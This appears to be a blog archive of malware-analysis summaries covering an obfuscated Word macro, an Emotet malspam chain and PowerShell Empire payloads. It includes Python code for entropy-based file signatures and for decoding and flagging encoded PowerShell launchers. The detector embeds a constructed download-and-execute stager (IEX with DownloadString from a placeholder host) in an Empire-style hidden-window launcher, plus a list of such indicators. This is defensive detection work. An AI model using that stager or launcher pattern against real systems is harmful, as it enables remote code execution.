vba macro

January 2021

On December 16th, 2020 Twitter user Insomnihack (@pro_integritate) posted an interesting obfuscated document, which some sandboxes flagged as Dridex. This sample threw an error and would not open in Office 2010 until I changed the file extension to "doc". The thing that stood out the most on initial inspection is the massive use of "wd..." properties such as "wdArtWeavingStrips"; each of these names maps to a numeric value from the Word Enumerated Constants (the enumerations of the Word object model), so resolving them to their values is the first step before the rest of the macro can be evaluated.

February 2019

This article covers the analysis of an interesting customer malspam encounter that was identified with a user-defined signature focusing on high levels of entropy within the file. It started with a PDF lure that led to a macro-laden downloader document and finished with the Emotet banking malware.
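As an added illustration of what an entropy-focused signature measures (my own example, not the customer signature or InQuest code from the article), the following Python computes Shannon entropy over sliding windows and flags a file once enough windows exceed a threshold. The sample "document" is constructed in the block itself: repetitive prose with a deterministic high-entropy blob embedded in the middle, standing in for an encrypted or packed payload; the window size, step, threshold and hit count are assumptions chosen for the demo.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data):
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data, window=512, step=256, threshold=7.0):
    """Slide a window over the file and return (offset, entropy) for each
    window at or above the threshold. step < window so region edges are not
    missed between two windows."""
    hits = []
    for off in range(0, max(len(data) - window, 0) + 1, step):
        e = shannon_entropy(data[off:off + window])
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def entropy_signature(data, window=512, step=256, threshold=7.0, min_hits=2):
    """Constructed stand-in for a 'high entropy' user-defined signature: the
    file is flagged when at least min_hits windows exceed the threshold, which
    avoids firing on a single small compressed image in an otherwise plain file."""
    hits = high_entropy_windows(data, window, step, threshold)
    return {
        "whole_file": round(shannon_entropy(data), 2),
        "hits": hits,
        "flagged": len(hits) >= min_hits,
    }


def build_sample():
    """Constructed test file: low-entropy prose, then a deterministic
    pseudo-random blob (chained SHA-256 output) standing in for a packed
    payload, then more prose. Returns the bytes and the blob's byte range."""
    prose = b"Dear customer, please find the attached invoice. " * 40
    blob = b""
    seed = b"constructed-sample"
    while len(blob) < 2048:
        seed = hashlib.sha256(seed).digest()
        blob += seed
    trailer = b"Kind regards, Accounts Payable. " * 10
    data = prose + blob + trailer
    return data, len(prose), len(prose) + len(blob)


if __name__ == "__main__":
    sample, start, end = build_sample()
    print(entropy_signature(sample), "blob at", start, end)
```

Whole-file entropy on its own is a weak signal because a large plain-text wrapper dilutes a small payload; the windowed view is what localises the suspicious region and keeps the threshold meaningful for files of any size.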

January 2019

PowerShell Empire is a go-to tool for pentesters, red teamers, and cyber-criminals. While it is an incredible framework, the InQuest platform easily detects the obfuscated payloads that are generated.
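To make the detection side concrete, here is an added example of my own (not InQuest's detection logic and not Empire's code): a Python checker that pulls the argument of -EncodedCommand (and its accepted short forms) out of a PowerShell command line, decodes the base64-wrapped UTF-16LE script, and flags download-and-execute primitives. The launcher line is constructed in the shape commonly seen from Empire stagers, "powershell -noP -sta -w 1 -enc <base64>", which is an assumption about the form rather than a captured sample; the script body is my own stand-in that targets a reserved .invalid hostname.

```python
import base64
import binascii
import re

# Constructed script body standing in for an Empire-style stager: fetch a
# second stage over HTTP and run it with IEX. The host is a reserved .invalid
# name, so nothing here resolves or executes.
STAGE_SCRIPT = (
    "$wc=New-Object System.Net.WebClient;"
    "$wc.Headers.Add('User-Agent','Mozilla/5.0');"
    "IEX $wc.DownloadString('http://example.invalid/index.asp')"
)


def encode_command(script):
    """Encode a script the way powershell.exe -EncodedCommand expects:
    UTF-16LE text, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed launcher in the assumed shape 'powershell -noP -sta -w 1 -enc <b64>'.
CONSTRUCTED_LAUNCHER = "powershell -noP -sta -w 1 -enc " + encode_command(STAGE_SCRIPT)

# -e, -ec, -en, -enc and -encodedcommand are all accepted prefixes of -EncodedCommand.
_ENC_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Hidden-window, no-profile and non-interactive switches typical of launchers.
_WRAPPER_FLAGS = re.compile(
    r"-(?:nop|nopr|noprofile|w\s+1|w\s+hidden|sta|noni|noninteractive)\b", re.IGNORECASE)
# Download-and-execute primitives to look for in the decoded script.
_SCRIPT_INDICATORS = [
    "IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
    "FromBase64String", "Invoke-WebRequest", "Start-BitsTransfer",
]


def decode_encoded_command(b64):
    """Return the decoded script, or None when the argument is not valid
    base64-wrapped UTF-16LE (bad alphabet, bad padding, odd byte count)."""
    try:
        raw = base64.b64decode(b64, validate=True)
        if len(raw) % 2:
            return None
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Flag a PowerShell command line carrying an encoded script that uses
    download/execute primitives. Returns the evidence alongside the verdict."""
    result = {"encoded": False, "decoded": None, "wrapper_flags": [],
              "indicators": [], "flagged": False}
    result["wrapper_flags"] = sorted({f.lower() for f in _WRAPPER_FLAGS.findall(cmdline)})
    m = _ENC_ARG.search(cmdline)
    if not m:
        return result
    result["encoded"] = True
    decoded = decode_encoded_command(m.group(1))
    result["decoded"] = decoded
    if decoded is not None:
        low = decoded.lower()
        result["indicators"] = [i for i in _SCRIPT_INDICATORS if i.lower() in low]
    # An encoded command alone is common in legitimate admin tooling, so require
    # download-and-execute evidence, or an undecodable blob behind hidden-window flags.
    result["flagged"] = bool(result["indicators"]) or (
        decoded is None and bool(result["wrapper_flags"]))
    return result


if __name__ == "__main__":
    print(analyze_command_line(CONSTRUCTED_LAUNCHER))
```

Decoding before matching is the point: string signatures on the raw command line only see base64, and the same script re-encoded with different whitespace or casing produces a completely different blob, whereas the decoded text still carries IEX and DownloadString.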